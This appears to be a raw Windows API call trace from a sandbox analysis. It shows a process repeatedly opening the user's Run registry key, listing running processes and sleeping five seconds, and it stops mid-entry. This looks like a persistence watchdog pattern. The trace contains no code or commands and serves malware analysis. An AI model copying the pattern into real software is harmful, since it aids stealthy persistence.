[0179.626] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.627] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.627] NtClose (Handle=0x274) returned 0x0 [0179.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.637] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.638] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.638] NtClose (Handle=0x274) returned 0x0 [0179.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.647] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.648] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.648] NtClose (Handle=0x274) returned 0x0 [0179.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.657] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.658] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.658] NtClose (Handle=0x274) returned 0x0 [0179.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.668] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.668] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.668] NtClose (Handle=0x274) returned 0x0 [0179.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.679] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.680] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.680] NtClose (Handle=0x274) returned 0x0 [0179.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.691] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.692] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.693] NtClose (Handle=0x274) returned 0x0 [0179.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.703] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.705] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.705] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.705] NtClose (Handle=0x274) returned 0x0 [0179.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.719] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.721] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.721] NtClose (Handle=0x274) returned 0x0 [0179.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.760] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.761] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.761] NtClose (Handle=0x274) returned 0x0 [0179.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.773] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.774] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.774] NtClose (Handle=0x274) returned 0x0 [0179.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.786] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.788] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.788] NtClose (Handle=0x274) returned 0x0 [0179.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.799] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.800] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.800] NtClose (Handle=0x274) returned 0x0 [0179.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.812] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.812] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.812] NtClose (Handle=0x274) returned 0x0 [0179.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 